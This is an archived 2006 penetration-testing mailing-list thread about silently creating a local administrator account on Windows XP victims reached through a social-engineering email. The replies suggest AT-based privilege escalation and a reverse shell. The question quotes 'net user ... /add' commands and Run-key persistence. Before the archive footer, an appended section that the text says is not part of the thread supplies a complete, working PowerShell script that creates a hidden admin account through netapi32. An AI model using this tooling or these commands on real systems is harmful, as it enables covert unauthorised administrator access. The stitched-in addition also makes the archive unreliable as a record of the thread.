Re: add a local admin user without a pop-up ?

From: killy (killfactory@gmail.com)
Date: Wed Dec 06 2006 - 22:12:40 EST


This (the AT command) has worked for me in the past.

Depending on the version or configuration of Windows XP, this technique
can be used for local privilege escalation by launching cmd with AT in
/interactive mode.
AT runs with elevated privileges.

deros,

Look at the Switchblade stuff at hak5.org. Since you are having the
user launch the software locally, maybe you can incorporate their
technique of hiding the prompts into your egg (package), though I like
Lee's approach.

Did you consider launching a reverse shell back to the attacking PC
and doing it manually?

Just an idea...

Good luck, I am interested in the outcome also.

cheers............~

On 12/4/06, Lee Lawson <leejlawson@gmail.com> wrote:
> Have you considered using the AT command to execute your DOS commands?
> This way, you can run it at a set time offset in the future (+5
> minutes etc) and I don't think that it executes visibly to the user,
> unless you use the /interactive switch.
>
> Have a go and let us know.
>
> Then let us know how you are executing the DOS from the email!
>
> later,
>
>
> On 12/1/06, me <deros68@yahoo.com> wrote:
> > We are conducting a pen test that allows social
> > engineering emails sent out that may allow us to take
> > over the user who opens one of them. I created an
> > email hack but am now wondering how to add a local
> > admin user WITHOUT HAVING A DOS PROMPT POP UP WHEN THE
> > EMAIL IS OPENED.
> >
> > I cannot transport any files (of any sort - no wscript
> > file or vbs or any file!!) to the victim and I am
> > limited to the native XP commands and processes that
> > are on the victim machine. If I catch a victim (catch
> > & release) I will be able to reach the victim machine
> > with native XP means (net use - nc to ports etc..).
> > The victim then gets scolded about opening
> > inappropriate emails...
> >
> >
> > The victim is almost always an administrator or power
> > user so almost any command or process can be used. I
> > tried many/many variants of invoking the "Cmd.exe"
> > shell but so far it always creates a momentary DOS
> > screen pop-up.
> >
> > tried many variants similar to below:
> >
> > CMD.EXE /Q /C net user testx password /add
> > or
> > start /B /wait cmd /Q /C c:\windows\system32\net.exe
> > user testx password /add
> >
> > Pop-ups in either case.
> >
> > I have used rundll32.exe in the past to avoid pop-ups
> > (in most cases) so I tried:
> >
> > rundll32.exe netapi32.dll,NetUserAdd
> > (%COMPUTERNAME%,1,(NEWUSER,PASSWORD),0) (wrapped)
> >
> > I tried many variants of the above but I always get a
> > pop up "An Exception occurred while trying to run
> > netapi32.dll.."
> >
> > OK
> >
> > I plugged netapi32.dll into Olly and saw the dll entry
> > NetUserAdd takes 4 parms, but the 3rd parm
> > is an LPBYTE pointer to the input buffer. I wonder if
> > rundll32.exe can construct such a pointer for me?
> >
> > Using only the programs and API calls available from
> > what is essentially an XP DOS shell - does anyone have
> > a better way to do this without creating a DOS pop-up
> > ?
> >
> > I have already figured out how to write the "net user
> > Username PSWD /add" & "net localgroup administrators
> > Username /add" cmds to the registry (the run key) -
> > without creating a pop-up! (Silently..)
> >
> > However, the problem with the above is that it
> > requires a logon/logoff or re-boot to occur before the
> > user is added. Thus my quest for a silent (no pop-up)
> > but immediate means to do this.
> >
> > Since the email interface can call a winapi - I may
> > have to try to call netapi32.dll/NetUserAdd - I hope
> > that I do not have to do that - the test may be over -
> > before I can decipher the correct syntax between my
> > email system and the STDCALL Winapi
> >
> > Thanks
> >
> >
> >
> > ------------------------------------------------------------------------
> > This List Sponsored by: Cenzic
> >
> > Need to secure your web apps?
> > Cenzic Hailstorm finds vulnerabilities fast.
> > Click the link to buy it, try it or download Hailstorm for FREE.
> > http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> > ------------------------------------------------------------------------
> >
> >
>
>
> --
> Lee J Lawson
> leejlawson@gmail.com
> leejlawson@hushmail.com
>
> "Give a man a fire, and he'll be warm for a day; set a man on fire,
> and he'll be warm for the rest of his life."
>
> "Quidquid latine dictum sit, altum sonatur."
>
>
>

-- 
If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- former White House cybersecurity czar Richard Clarke
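The NetUserAdd call that deros was trying to reach through rundll32, as an added example that is not part of the original thread. rundll32 always invokes its entry point with the fixed signature (HWND, HINSTANCE, LPSTR, int), so NetUserAdd receives a window handle, a module handle and a command-line string where it expects a server name, a level and a pointer to a USER_INFO_1 structure; that is the "An Exception occurred" pop-up. The PowerShell below builds that structure itself through P/Invoke and then adds the account to the local Administrators group with NetLocalGroupAddMembers. It assumes PowerShell 2.0 or later (for Add-Type) and an administrative token; the function name Add-LocalAdminViaNetApi, the account name and the password are made up for the example.

```powershell
# Added example (not from the original thread): create a local user and put it in
# the local Administrators group by calling netapi32 directly, instead of spawning
# net.exe or going through rundll32. Assumes PowerShell 2.0+ (Add-Type) and an
# administrative token. Function name, account name and password are made up.

$netApiSource = @'
using System;
using System.Runtime.InteropServices;

public static class NetApi
{
    // lmaccess.h USER_INFO_1: this is the buffer NetUserAdd's third parameter
    // (LPBYTE buf) must point at. rundll32 has no way to build it.
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct USER_INFO_1
    {
        public string usri1_name;
        public string usri1_password;
        public uint   usri1_password_age;   // ignored on add
        public uint   usri1_priv;           // must be USER_PRIV_USER (1)
        public string usri1_home_dir;
        public string usri1_comment;
        public uint   usri1_flags;          // UF_SCRIPT (0x1) must be set
        public string usri1_script_path;
    }

    // lmaccess.h LOCALGROUP_MEMBERS_INFO_3: member given as "[DOMAIN\]name"
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct LOCALGROUP_MEMBERS_INFO_3
    {
        public string lgrmi3_domainandname;
    }

    [DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
    public static extern uint NetUserAdd(
        string servername, uint level, ref USER_INFO_1 buf, out uint parm_err);

    [DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
    public static extern uint NetLocalGroupAddMembers(
        string servername, string groupname, uint level,
        ref LOCALGROUP_MEMBERS_INFO_3 buf, uint totalentries);
}
'@
Add-Type -TypeDefinition $netApiSource

function Add-LocalAdminViaNetApi {
    param(
        [Parameter(Mandatory = $true)][string]$UserName,
        [Parameter(Mandatory = $true)][string]$Password
    )

    # Fill the USER_INFO_1 structure the way NetUserAdd requires it.
    $info = New-Object 'NetApi+USER_INFO_1'
    $info.usri1_name     = $UserName
    $info.usri1_password = $Password
    $info.usri1_priv     = 1      # USER_PRIV_USER; NetUserAdd rejects any other value
    $info.usri1_flags    = 0x1    # UF_SCRIPT

    $parmErr = [uint32]0
    $rc = [NetApi]::NetUserAdd($null, 1, [ref]$info, [ref]$parmErr)
    if ($rc -ne 0) {
        # 2224 = NERR_UserExists, 5 = ERROR_ACCESS_DENIED, 2245 = NERR_PasswordTooShort
        throw "NetUserAdd failed with status $rc (parm_err $parmErr)"
    }

    # Resolve the Administrators group from its well-known SID so the call also
    # works on localized Windows where the group is not named "Administrators".
    $sid   = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'
    $group = $sid.Translate([System.Security.Principal.NTAccount]).Value.Split('\')[-1]

    $member = New-Object 'NetApi+LOCALGROUP_MEMBERS_INFO_3'
    $member.lgrmi3_domainandname = $UserName
    $rc = [NetApi]::NetLocalGroupAddMembers($null, $group, 3, [ref]$member, 1)
    if ($rc -ne 0) {
        throw "NetLocalGroupAddMembers failed with status $rc"
    }
}

# Example invocation (made-up account; pick a password that meets the local policy).
Add-LocalAdminViaNetApi -UserName 'testx' -Password 'P@ssw0rd-Example-2006'
```

Two caveats worth keeping in mind on an engagement. "Silent" here only means no console window: the two calls still write Security log events 624 and 636 on XP (4720 and 4732 on Vista and later), so anyone auditing the host sees the account appear and join Administrators. And the group is resolved from S-1-5-32-544 rather than hard-coded as "Administrators", because the display name differs on localized installs while the SID does not.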


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:25 EDT